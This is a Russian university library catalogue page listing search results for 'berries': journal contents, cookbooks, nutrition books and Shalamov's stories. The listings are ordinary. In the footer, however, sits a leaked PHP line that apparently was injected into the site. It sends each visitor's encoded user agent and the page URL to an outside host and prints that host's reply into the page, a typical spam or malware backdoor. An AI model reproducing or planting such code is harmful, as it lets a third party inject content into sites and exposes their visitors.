Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

181 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЯГОДЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 25
1. 
Экология и жизнь. - Журнал, 2010г. № 7
Оглавление 
  • Фиговский, О. Как нам обустроить науку / О. Фиговский. - с.22-23.
  • Елдышев, Ю. Н. Нелегальные рубки. Почему они не прекращаются в наших лесах / Ю. Н. Елдышев. - с.24-25 : ил.
  • Карпачевский, М. Современное лесное законодательство и нелегальные лесозаготовки в России / М. Карпачевский. - с.26-28 : ил.
  • Водолазкин, Е. Г. Экология культуры / Е. Г. Водолазкин. - с.34.
  • Бондарчук, Е. А. От подкормки птиц до визита к мэру / Е. А. Бондарчук, М. Е. Рыхликова. - с.35-38 : ил.
  • Кулик, А. В. Соль жизни / А. В. Кулик. - с.42-47 : ил.
  • Елдышев, Ю. Н. Как сохранить энергию / Ю. Н. Елдышев. - с.50-56 : ил.
    Кл. слова: Хранение энергии, Метановый проект, Маховики
  • Школьников, Е. И. Что такое алюмоэнергетика / Е. И. Школьников. - с.57-62 : ил.
  • Биорегионы России - "зеленая революция". - с.64-65 : ил.
  • Михеев, Н. Н. Вода - природный ресурс для сотрудничества и для жизни / Н. Н. Михеев. - с.66-71 : ил.
    Кл. слова: Проблема каналов, Проблема фильтров
  • Елдышев, Ю. Н. "Пост сдан, пост принят!, или спасти Балтику / Ю. Н. Елдышев. - с.72-76 : ил.
  • Ким, Е. Летят перелетные птицы... / Е. Ким. - с.77-79 : ил.
  • Онищенко, Г. Г. Приоритетная задача национальной безопасности. Радиационно-гигиеническая обстановка на территории России / Г. Г. Онищенко. - с.82-83 : ил.
    Кл. слова: Облучение
  • "Радон" - надежный радиационный щит Москвы. - с.85-87 : ил.
  • Передерин, В. Грибы грибам рознь / В. Передерин. - с.88-89 : ил.
    Кл. слова: Плесень
  • Кузнецов, И. Соленые ягоды / И. Кузнецов. - с.90-93 : ил.
2. 
Постный стол [Текст] / ред., сост. Т. А. Ружинская, дар. А. В. Мышлявцев, 1999. - 345 с.
Держатели документа (Информация об экземплярах) 
3. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
4. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
5. 
Охрана труда и социальное страхование. - Журнал, 2011г. № 8
Оглавление 
  • Сафонов, А. Л. По пути непрерывного совершенствования / А. Л. Сафонов. - с.3-12
  • Герасимова, Т. Непосильная ноша / Т. Герасимова. - с.13-18
  • Щемелев, Ю. Проблема государственного значения / Ю. Щемелев. - с.19-25
  • Крайкин, В. Работаем без травматизма / В. Крайкин. - с.26-32
  • Щербаков, В. Ориентир - профилактика / В. Щербаков. - с.34-41
  • Бикметов, Р. Независимая экспертиза качества АРМ / Р. Бикметов. - с.42-49
  • Федорец, А. Нормативное регулирование и стандартизация / А. Федорец. - с.50-58
  • Лайкам, К. Э. Финансирование мероприятий по охране труда / К. Э. Лайкам. - с.59-60
  • Попович, В. Что предусмотрено в Техническом регламенте / В. Попович, Т. Киселева. - с.61-66
  • Рябова, В. Отношение работодателя к вопросам обучения / В. Рябова. - с.67-73
  • Нечаенко, Е. Как уберечься от инсульта / Е. Нечаенко. - с.74-76
  • Федорова, Л. Плоды и ягоды - под контроль / Л. Федорова. - с.77-80
  • Шидловский, В. Медосмотры охранников / В. Шидловский. - с.81-87
  • Степанов, А. Радиационная безопасность / А. Степанов. - с.88-92
  • Устав о дисциплине работников организаций, эксплуатирующих особо радиационно опасные и ядерно опасные производства и объекты в области использования атомной энергии. - с.93-96
  • Фруктов, А. Проблемы и опыт / А. Фруктов
  • Преображенский, В. Обеспечить надежную защиту / В. Преображенский
  • Гринева, Н. Прочно, эстетично, безопасно / Н. Гринева
  • Орлов, В. Без СИЗ в колодце / В. Орлов
  • Турчин, В. В огне не горит, в воде не тонет / В. Турчин
  • Белоусов, К. От каски до бронешлема / К. Белоусов
  • Гришина, Е. В хоккей играют настоящие мужчины / Е. Гришина
  • Климовская, И. Победа над комарами и ультрафиолетовыми лучами / И. Климовская
  • Левин, С. Сроки носки, нормы выдачи и качество СИЗ / С. Левин
  • Гришина, Е. [Отвечаем читателям] / Е. Гришина
Держатели документа (Информация об экземплярах) 
6. 
Пищевая промышленность. - Журнал, 2010г. № 8
Оглавление 
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-май 2010 г.. - с.6-7
  • Колончин, К. В. Научное и образовательное обеспечение продовольственной безопасности Российской Федерации / К. В. Колончин, Д. А. Еделев, А. Ю. Колеснов. - с.8-11
  • Разработка новых рецептур соусов и дрессингов функционального назначения. - с.12-13
  • Тимофеева, К. Г. Биологически активная добавка к пище на основе хитина / К. Г. Тимофеева, Е. Э. Куприна. - с.14-16
  • Шелепина, Н. В. Применение горохового крахмала в производстве концентратов киселей / Н. В. Шелепина. - с.18-19
  • Васнева, И. К. Чечевица - сырье для производства продуктов антистрессовой направленности / И. К. Васнева, О. Е. Бакуменко. - с.20-22
  • Прянишников, В. В. Принципы создания продуктов питания для людей пожилого возраста / В. В. Прянишников, Т. М. Гиро, П. Микляшевски. - с.23
  • Колбасные изделия для геродиетического питания. - с.24-25
  • Болотов, В. М. Черносмородиновый краситель - источник антиоксидантов при производстве кондитерских изделий / В. М. Болотов, П. Н. Саввин. - с.26-27
  • Фруктозо-глюкозный сироп "Одуванчиковый". - с.28-29
  • Крюкова, Е. В. Разработка новых пищевых продуктов с учетом требований потребителей / Е. В. Крюкова, Л. В. Беркетова, Е. Л. Беленко. - с.30-32
  • Козубаева, Л. А. Печенье для безглютенового питания / Л. А. Козубаева, С. С. Кузьмина, М. Н. Вишняк. - с.33
  • Перспективы совершенствования пищеконцентратной отрасли до 2020 г.. - с.34-37
  • Онищенко, Г. Г. О Таможенном союзе / Г. Г. Онищенко. - с.37
  • Драчева, Л. В. Кристаллоскопический метод: функциональные морфотипы и здоровое питание / Л. В. Драчева. - с.38-39
  • Сенсорный контроль качества хлебобулочных изделий. - с.40-42
  • Гаприндашвили, И. Р. Биологически активные вещества плодов унаби / И. Р. Гаприндашвили, В. В. Кутубидзе, Т. Х. Мамулаишвили. - с.43
  • Традиционный вкус любимого майонеза от ГК "Союзснаб". - с.44
  • Губина, М. Д. Замороженные ягоды как стратегический запас для переработки в межсезонный период / М. Д. Губина, Н. А. Лучина. - с.46-47
  • Спицын, А. Поддержание качества продукта / А. Спицын. - с.47
  • Преснякова, О. П. Винодельческие предприятия и вина Тосканы / О. П. Преснякова, Е. Кушнерева. - с.48-50
  • [Новости НИИ и вузов]. - с.51
  • [Новости отраслевых союзов]. - с.52-53
  • [Новости компаний]. - с.54-55
  • AVERS представляет. - с.56-57
  • Азрилевич, М. Р. IX Международный Сахарный Форум / М. Р. Азрилевич. - с.58-59
  • Бурдун, Н. И. Стратегические решения для российской индустрии упаковки / Н. И. Бурдун. - с.60-61
  • Программа "Российское качество" в действии. - с.61
  • Бавария - надежный и перспективный партнер России. - с.62-63
  • Конференция кондитеров России, Казахстана и Белоруссии. - с.63
  • Егоров, Ю. Н. "Студент хочет есть быстро, вкусно и без последствий! " / Ю. Н. Егоров. - с.65
7. 
Хранение и переработка сельхозсырья. - Журнал, 2010г. № 12
Оглавление 
  • Математическое обоснование в соотношении динамик показателей баланса для обеспечения снижения импорта продукта - экструдата на ближайший прогнозный период. - с.8-10
  • Давыдов, С. А. Экспорт муки как одно из основных направлений увеличения коэффициента использования мукомольных мощностей / С. А. Давыдов. - с.10-13
  • Краснов, А. Е. Оценка эффективности инвестиций и целесообразности внедрения когенерационных установок в пищевой промышленности / А. Е. Краснов, И. В. Куликова. - с.13-15
  • Филатов, В. В. Анализ методов инфракрасной спектрометрии для определения оптических характеристик капиллярно-пористых материалов / В. В. Филатов. - с.16-21
  • Исследование процесса рафинации форпрессового хлопкового масла. - с.21-23
  • Гнездилова, А. И. Влияние некоторых параметров на кинетику кристаллизации лактозы / А. И. Гнездилова, Ю. В. Виноградова. - с.24-26
  • Дранников, А. В. Исследование процесса теплообмена при сушке свекловичного жома перегретым паром в активном гидродинамическом режиме / А. В. Дранников. - с.26-29
  • Голубева, Л. В. Методика определения растворимости сухих молочных продуктов на основе кондуктометрических измерений / Л. В. Голубева, С. А. Титов, Н. П. Довгун. - с.30-32
  • Зангиева, Б. Г. Стевия - натуральный низкокалорийный подсластитель / Б. Г. Зангиева, В. Б. Цугкиева, Б. Г. Цугкиев. - с.32-34
  • Гуць, В. С. Исследование адгезии термостабильных начинок для мучных изделий / В. С. Гуць, А. А. Кирьянова, И. Л. Корецкая. - с.34-36
  • Глаголева, Л. Э. Сорбционные свойства пищевых волокон вторичных продуктов переработки растительного сырья в молочно-белковых пищевых системах / Л. Э. Глаголева, Н. С. Родионова, Н. П. Зацепилина. - с.36-38
  • Влияние формы связи влаги фаршевых систем на основе различного рыбного сырья методом DTA. - с.39-41
  • Дзадзиева, М. С. Ягоды лаконоса костянкового и лаконоса американского - источники красящих веществ / М. С. Дзадзиева, Б. Г. Цугкиев. - с.41-43
  • Юдин, А. Ю. Жировые продукты при приготовлении хлебобулочных изделий из пшеничной муки высшего сорта / А. Ю. Юдин, Ю. М. Феофанова, Е. Е. Дудник. - с.43-47
  • Тагиров, Х. Х. Качественные показатели мясной продуктивности чистопородных и помесных бычков / Х. Х. Тагиров, И. Н. Губайдуллин, Р. Ш. Давлетов. - с.47-48
  • Артюхова, С. И. Использование лактитола в технологии производства биопродукта / С. И. Артюхова, Ю. А. Гаврилова. - с.49-50
  • Талибова, А. Г. Исследование стабильных изотопов для оценки качества и безопасности пищевых продуктов / А. Г. Талибова, А. Ю. Колеснов. - с.51-55
  • Бессонова, Л. П. Управление рисками на предприятиях по производству и переработке зерна / Л. П. Бессонова, В. И. Манжесов. - с.55-57
  • Куликова, И. В. Актуальность создания системы мониторинга качества зерна / И. В. Куликова, А. Е. Краснов, О. Е. Щербакова. - с.58-59
  • Ахатова, И. А. Использование сухого кобыльего молока при производстве йогурта / И. А. Ахатова, С. Г. Канарейкина. - с.60-62
  • Причко, Т. Г. Оценка сырьевых источников функциональных ингридиентов для продуктов профилактического назначения / Т. Г. Причко, И. А. Мачнева, В. Т. Кондратов. - с.63-65
  • Брыкалов, А. В. Переработка соломистых отходов гриба вешенки / А. В. Брыкалов, Е. С. Романенко, О. В. Шарипова. - с.66
  • Камышева, И. М. Использование продуктов переработки семян амаранта / И. М. Камышева. - с.67-71
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2011г. № 10
Оглавление 
  • Еделев, Д. А. Устранение рисков на протяжении жизненного цикла продуктов питания / Д. А. Еделев, В. М. Кантере, В. А. Матисон. - с.42-44
  • Закон защищает интересы потребителя. - с.64-66
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-июль 2011 г.. - с.6-7
  • Серегин, С. Н. Создание современной системы хранения сельскохозяйственного сырья и продовольствия в решении задачи продовольственной безопасности России / С. Н. Серегин, К. В. Колончин. - с.8-11
  • Технологический поток фасовки и укупоривания двухфазных плодоовощных консервов. - с.12-13
  • Семенова, А. А. Вертикальная обвалка мяса / А. А. Семенова, В. В. Насонова, Ф. В. Холодов. - с.14-15
  • Груздева, Е. Н. Насосное оборудование для сыродельных предприятий / Е. Н. Груздева. - с.16-17
  • Оборудование для измельчения и диспергирования. - с.18-22
  • Шингисов, А. У. Вакуум-сублимационная сушка сгущенных кисломолочных продуктов с растительными добавками / А. У. Шингисов. - с.24-25
  • Цветометрическое количественное определение аминокислот и глицилглицина в водных растворах. - с.26-28
  • За упаковку давали награды и лишали жизни. - с.30-31
  • Стратегия развития машиностроения для пищевой и перерабатывающей промышленности. - с.32-33
  • Минаев, М. Ю. Экспресс-тест-система для определения остаточных белковых загрязнений / М. Ю. Минаев, Т. А. Фомина. - с.34-35
  • Груздева, Е. Н. Современное очистное оборудование на предприятиях молочной промышленности / Е. Н. Груздева. - с.36-37
  • Установки для гидрооптического обеззараживания воды. - с.38-39
  • Получение комплексов циклодекстринов с биологически активными веществами. - с.67-69
  • Функциональный паштет на основе прудовой рыбы с добавлением кальмара. - с.70-72
  • Первушин, В. В. Биологически активные вещества, повышающие адаптацию к физическим нагрузкам / В. В. Первушин, О. Е. Бакуменко. - с.73-74
  • [Новости НИИ и вузов]. - с.75
  • [Новости отраслевых союзов]. - с.76-77
  • [Новости компаний]. - с.78-79
  • Драчева, Л. В. Малая энергетика / Л. В. Драчева. - с.80
  • Продукты быстрого приготовления - мифы развенчаны. - с.81
  • Всероссийский фестиваль "Молочная страна-2011". - с.82
  • Семинары "Ярмарка идей". - с.83
  • Бурдун, Н. И. День знаний в МГУТУ / Н. И. Бурдун. - с.84-85
  • Новое интеллектуальное решение от "Тетра Пак". - с.39
  • Драчева, Л. В. Научно-практический семинар по моющим средствам / Л. В. Драчева. - с.40-41
  • Шумилова, И. Ш. Система оценки поставщиков продукции для предприятий общественного питания / И. Ш. Шумилова, Р. Р. Гадлгареева. - с.46-49
  • Коновалов, К. Л. Традиции и история мясного дела в Центральной Европе / К. Л. Коновалов. - с.50-53
  • Воробьева, О. В. Супы блокадного Ленинграда / О. В. Воробьева. - с.54-56
  • Жирард, Кристен. Потенциал ягоды на рынке здоровых снеков / К. Жирард. - с.58-59
  • Инкапсулированные ароматизаторы "Del'Ar" сделают продукты питания вкуснее. - с.60
  • Маджитов, Д. Ф. Трансглютаминаза от компании "Флора Ингредиентс" - эффективно и экономично / Д. Ф. Маджитов. - с.62-63
9. 
Пищевая промышленность. - Журнал, 2011г. № 7
Оглавление 
  • Рустамбекова, С. А. Эффективность применения пищевых биологически активных композиций / С. А. Рустамбекова, Г. Г. Козлова, Т. П. Вознесенская. - с.48-49
  • Подразделение Bosch Packaging Technology нацелено на дальнейший рост. - с.52
  • [Новости компаний]. - с.54
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-апрель 2011 г.. - с.6-7
  • Растительное сырье в технологии комбинированных полуфабрикатов. - с.8-10
  • Лучина, Н. А. Ягоды и плоды, протертые с сахаром, для производства консервов / Н. А. Лучина. - с.12-13
  • Разработка рецептуры теста с нетрадиционным фитосырьем. - с.14-15
  • Кунташов, Е. В. Сырокопченые колбасы с натуральными биокорректорами / Е. В. Кунташов, М. И. Правдивцева, Н. М. Птичкина. - с.16-17
  • Клюквенный сок для поддержания здоровой работы сердца. - с.17
  • Кику-Банарюк, А. И. Обработка овощных полуфабрикатов раствором юглона / А. И. Кику-Банарюк. - с.18-20
  • Чурмасова, Л. А. Экологическая безопасность / Л. А. Чурмасова, С. С. Титова. - с.22-23
  • Панова, О. А. Установка для пылеулавливания при переработке зерна / О. А. Панова, Ю. В. Красовицкий. - с.24-25
  • Драчева, Л. В. Родники России / Л. В. Драчева. - с.26-27
  • Драчева, Л. В. Экологический форум / Л. В. Драчева. - с.28
  • Драчева, Л. В. ВэйстТэк-2011 / Л. В. Драчева. - с.29
  • Трясцин, М. М. Кластеризация в АПК - механизм повышения устойчивости системы продовольственного обеспечения региона / М. М. Трясцин, В. И. Кузнецов, А. В. Чазова. - с.30-33
  • Печеная, Л. Т. Стратегическое управление компаниями корпоративного типа в отраслях пищевой промышленности / Л. Т. Печеная, О. С. Травинкина. - с.34-37
  • Кочетов, В. К. Интенсификация получения мучных кондитерских изделий / В. К. Кочетов, Л. М. Аксенова, М. А. Талейсник. - с.38
  • Еделев, Д. А. Методы идентификации рисков в жизненном цикле продуктов питания / Д. А. Еделев, В. М. Кантере, В. А. Матисон. - с.40-42
  • Рыбин, М. Б. Настоящее и будущее масложировой отрасли глазами специалистов компании "СолПро" / М. Б. Рыбин, Д. В. Толкачева. - с.44-45
  • Бессонов, О. В. Современные направления обогащения молочных продуктов для детей / О. В. Бессонов. - с.46-47
  • Семинары "Ярмарка идей". Креативные инновации. - с.49
  • Бурдун, Н. И. Детские дегустации во ВНИИПБиВП / Н. И. Бурдун. - с.50
  • [Новости НИИ и вузов]. - с.55
  • [Новости отраслевых союзов]. - с.56-57
  • Выставки "Интерфуд" и "Продтех" в Санкт-Петербурге. - с.58-59
  • Ansell Healthcare вносит вклад в развитие пищевой промышленности. - с.61
  • Драчева, Л. В. VI Всероссийский антикризисный форум / Л. В. Драчева. - с.62
  • Сафонов, А. "Круглый стол" в РСПП по вопросам оптимального питания / А. Сафонов. - с.65
10. 
Молчанова Е. Н. Физиология питания [Текст] / Е. Н. Молчанова, 2014. - 240 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- ПИЩЕВАРЕНИЕ -- ОБМЕН ЭНЕРГЕТИЧЕСКИЙ -- ЭНЕРГОТРАТЫ ОРГАНИЗМА ЧЕЛОВЕКА -- МИКРОНУТРИЕНТЫ -- МАКРОНУТРИЕНТЫ -- БЕЛКИ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- КОМПОНЕНТЫ ПИЩИ -- ЦЕННОСТЬ ПИЩЕВАЯ -- МОЛОКО - ПИТАНИЕ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ -- ЯЙЦА - ПИТАНИЕ -- ЯЙЦЕПРОДУКТЫ - ПИТАНИЕ -- МЯСО - ПИТАНИЕ -- ПТИЦА - ПИТАНИЕ -- ПРОДУКТЫ МЯСНЫЕ - ПИТАНИЕ -- РЫБА - ПИТАНИЕ -- МОРЕПРОДУКТЫ - ПИТАНИЕ -- ЗЕРНО - ПИТАНИЕ -- ОВОЩИ - ПИТАНИЕ -- ФРУКТЫ - ПИТАНИЕ -- ЯГОДЫ - ПИТАНИЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ - ПИТАНИЕ -- ТЕОРИЯ ПИТАНИЯ НАУЧНАЯ -- ПИТАНИЕ НЕТРАДИЦИОННОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ

В учебном пособии изложены основы физиологии пищеварения, значение и функции органов пищеварительной системы, энергетического обмена. Рассмотрены биологическая роль и значение в питании макро- и микронутриентов, биологически активных веществ. Проанализированы различные теории питания и даны научные основы дифференциального питания для отдельных групп населения.

Для студентов высших учебных заведений, обучающихся по специальности "Технология продукции и организация общественного питания" и "Продукты питания из растительного сырья".

11. 
Тутельян В. А. Химический состав и калорийность российских пищевых продуктов [Текст] / В. А. Тутельян, 2012. - 283 с.
12. 
Домашняя кладовая [Текст] / сост. В. Донцов [и др.], 1993. - 429, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Как консервировать фрукты и ягоды без сахара, а овощи без соли [Текст] / сост. Т. Енко, 1992. - 127, [1] с.
Держатели документа (Информация об экземплярах) 
14. 
Витамины круглый год [Текст] / К. С. Петровский [и др.], 1983. - 94, [2] с.
Держатели документа (Информация об экземплярах) 
15. 
Витамины круглый год [Текст] / К. С. Петровский [и др.], 1985. - 94, [2] с.
Держатели документа (Информация об экземплярах) 
16. 
Руцкий, Аркадий Владимирович. Домашние заготовки [Текст] / А. В. Руцкий, 1993. - 255, [1] с.
Держатели документа (Информация об экземплярах) 
17. 
Ольгин, Ольгерт Маркович. Плоды земли [Текст] / О. Ольгин, 1991. - 123, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
18. 
Стрижев, Александр Николаевич. Лесная скатерть-самобранка [Текст] / А. Стрижев, 1992. - 237, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
19. 
Глебова, Екатерина Ильинична. Ягодный сад [Текст] / Е. И. Глебова, В. В. Даньков, М. М. Скрипниченко, 1990. - 206, [2] с.
Держатели документа (Информация об экземплярах) 
20. 
Кравцов, Анатолий Алексеевич. Препараты для защиты растений на приусадебном участке [Текст] / А. А. Кравцов, 1992. - 46, [2] с.
Держатели документа (Информация об экземплярах) 
21. 
Шаламов, Варлам Тихонович. Колымские рассказы [Текст] / В. Т. Шаламов, 2003. - 380, [1] с.
Оглавление 
  • Шаламов, Варлам Тихонович. По снегу / В. Т. Шаламов. - с.5
  • Шаламов, Варлам Тихонович. На представку / В. Т. Шаламов. - с.6
  • Шаламов, Варлам Тихонович. Ночью / В. Т. Шаламов. - с.13
  • Шаламов, Варлам Тихонович. Плотники / В. Т. Шаламов. - с.16
  • Шаламов, Варлам Тихонович. Одиночный замер / В. Т. Шаламов. - с.22
  • Шаламов, Варлам Тихонович. Посылка / В. Т. Шаламов. - с.25
  • Шаламов, Варлам Тихонович. Дождь / В. Т. Шаламов. - с.30
  • Шаламов, Варлам Тихонович. Кант / В. Т. Шаламов. - с.34
  • Шаламов, Варлам Тихонович. Сухим пайком / В. Т. Шаламов. - с.40
  • Шаламов, Варлам Тихонович. Инжектор / В. Т. Шаламов. - с.57
  • Шаламов, Варлам Тихонович. Апостол Павел / В. Т. Шаламов. - с.55
  • Шаламов, Варлам Тихонович. Ягоды / В. Т. Шаламов. - с.65
  • Шаламов, Варлам Тихонович. Сука тамара / В. Т. Шаламов. - с.55
  • Шаламов, Варлам Тихонович. Шерри-бренди / В. Т. Шаламов. - с.74
  • Шаламов, Варлам Тихонович. Детские картинки / В. Т. Шаламов. - с.81
  • Шаламов, Варлам Тихонович. Сгущенное молоко / В. Т. Шаламов. - с.84
  • Шаламов, Варлам Тихонович. Хлеб / В. Т. Шаламов. - с.89
  • Шаламов, Варлам Тихонович. Заклинатель змей / В. Т. Шаламов. - с.97
  • Шаламов, Варлам Тихонович. Татарский мулла и чистый воздух / В. Т. Шаламов. - с.105
  • Шаламов, Варлам Тихонович. Первая смерть / В. Т. Шаламов. - с.112
  • Шаламов, Варлам Тихонович. Тетя Поля / В. Т. Шаламов. - с.117
  • Шаламов, Варлам Тихонович. Галстук / В. Т. Шаламов. - с.122
  • Шаламов, Варлам Тихонович. Тайга золотая / В. Т. Шаламов. - с.129
  • Шаламов, Варлам Тихонович. Васька денисов, похититель свиней / В. Т. Шаламов. - с.134
  • Шаламов, Варлам Тихонович. Серафим / В. Т. Шаламов. - с.137
  • Шаламов, Варлам Тихонович. Выходной день / В. Т. Шаламов. - с.146
  • Шаламов, Варлам Тихонович. Домино / В. Т. Шаламов. - с.150
  • Шаламов, Варлам Тихонович. Геркулес / В. Т. Шаламов. - с.161
  • Шаламов, Варлам Тихонович. Шоковая терапия / В. Т. Шаламов. - с.165
  • Шаламов, Варлам Тихонович. Стланик / В. Т. Шаламов. - с.176
  • Шаламов, Варлам Тихонович. Красный крест / В. Т. Шаламов. - с.178
  • Шаламов, Варлам Тихонович. Заговор юристов / В. Т. Шаламов. - с.188
  • Шаламов, Варлам Тихонович. Тифозный карантин / В. Т. Шаламов. - с.208
  • Шаламов, Варлам Тихонович. Последний бой майора Пугачева / В. Т. Шаламов. - с.231
  • Шаламов, Варлам Тихонович. По лендлизу / В. Т. Шаламов. - с.246
  • Шаламов, Варлам Тихонович. Надгробное слово / В. Т. Шаламов. - с.256
  • Шаламов, Варлам Тихонович. Почерк / В. Т. Шаламов. - с.272
  • Шаламов, Варлам Тихонович. Крест / В. Т. Шаламов. - с.277
  • Шаламов, Варлам Тихонович. Первый чекист / В. Т. Шаламов. - с.285
  • Шаламов, Варлам Тихонович. Поезд / В. Т. Шаламов. - с.296
  • Шаламов, Варлам Тихонович. Сучья война / В. Т. Шаламов. - с.307
  • Шаламов, Варлам Тихонович. Тишина / В. Т. Шаламов. - с.334
  • Шаламов, Варлам Тихонович. Перчатка / В. Т. Шаламов. - с.343


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3217 - 31.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.46 с.24 запросов, 0.87c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;